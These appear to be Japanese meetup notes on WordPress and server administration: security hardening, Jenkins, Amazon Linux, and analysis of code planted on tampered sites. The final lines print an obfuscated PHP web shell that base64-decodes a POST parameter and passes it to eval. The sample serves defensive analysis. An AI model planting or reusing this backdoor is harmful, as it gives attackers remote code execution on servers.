内容
脆弱性
- MySQLの不満あれこれ
- いつの間にかテーブルサイズが肥大化する
- プラグインによっては、wp_optionsテーブルが肥大化。。。
- 「汎用化」に振りすぎ?
- WordPressのセキュリティ対策
- REST APIで脆弱性が増えたかも
- パーミッションに注意
- セーフモードは既に意味なさげ
- プラグインを制限する
- 接続元を国内限定にする(かなり効いた)
- ファイルのチェックサムを取る
- gitで管理する
- WPScanかける
- …のような面倒な作業はJenkinsに任せたい(LDAPサーバーどうしよう)
- Jenkinsによる自動化とか勉強会やってみたい
- Jenkins2.0でPipelineが導入された。便利そう
- うちのインフラ部門がAmazon Linux大好きなので、最近そちらやってます
- Debian慣れしてるので、Amazon Linux気持ち悪い
- RedHatに似てるが、バージョンをがんがんあげるので互換性に不安
- CentOSめんどくさい
- やはりサーバーは2-3年で更新しないと
- クラウドで管理はだいぶ楽になった
- Shell Scrptでちまちま管理してましたがAnsibleでOK
- OpenStackまわりとかやってみたいね(ConoHaとか)
- Vineなつかし。MecabはまだUTF-8がデフォルトじゃないのかしら
- 幸いWordPressの闇はまだ見たことないです
- Webの勉強会開催は難しい?
- 勉強会のフォームを用意して、「あとはよろしくね」というメソッドが有効?
- WordBench姫路開催の予感
- WordBench京都、大阪、神戸の所感もげもげ
- サーバー管理ネタをWordBenchあたりで話してみる?
- サーバーアプリケーションの脆弱性対応は、業者ではやりにくい(検閲とかに該当)
- WordPress改竄スクリプトの解析とかやってるところもあります
- 改竄コードの例
- $$dataという変数に、あらかじめbase64でエンコードしておいた生データをデコード、代入している
- $$dataをそのままeval、とかやってそう
- 怪し気なzipファイルを展開している
- zipファイル展開確認。フィッシングサイトを開設するとおぼしきPHPのコード一式が入っていた
- おそらく同時に撒いたであろうspamにここのURLが入ってるはず
- ACLファイルを入れ替えられてるも
- Fail2banをSMTPなどにも入れている
- sshアクセスはWebからのアクセス元のみに限定する
- FollowSymlinkの禁止を導入したが、一部ツールはこれに依存していたりする
- JavaScriptの脆弱性
<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[0]);if (isset(${$s20}['nd335c3'])) {
eval($s21(${$s20}['nd335c3']));
}
?>